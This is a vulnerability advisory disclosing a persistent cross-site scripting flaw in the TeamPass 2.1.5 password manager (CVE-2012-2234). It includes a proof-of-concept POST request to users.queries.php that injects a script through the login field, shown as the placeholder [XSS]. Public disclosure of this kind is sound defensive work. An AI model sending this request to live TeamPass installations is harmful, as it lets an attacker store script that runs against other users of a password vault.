Title: ETeamPass v2.1.5 (users.queries.php) Persistent Cross-Site
Scripting (XSS)
Type: Remote
Severity: Medium
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 16.04.2012
CVE: CVE-2012-2234
Author: Marcos Garcia (@artsweb)
Release mode: Coordinated release
Summary
=======
TeamPass is a Passwords Manager dedicated for managing passwords in a
collaborative way on any server Apache, MySQL and PHP.
Description
===========
A Persistent Cross Site Scripting vulnerability was found in TeamPass,
because the application fails to sanitize user-supplied input. The
vulnerability can be triggered by any user.
Vendor
======
TeamPass - http://www.teampass.net/
Affected Version
================
2.1.5
PoC
===
Attack: login=[XSS] (POST)
POST /TeamPass/sources/users.queries.php HTTP/1.1
type=add_new_user&login=[XSS]&pw=testing2&email=test&admin=false&manager=true&read_only=false&personal_folder=false&new_folder_role_domain=false&domain=test&key=key
Solution
========
Upgrade to TeamPass v2.1.6 (http://www.teampass.net/download/)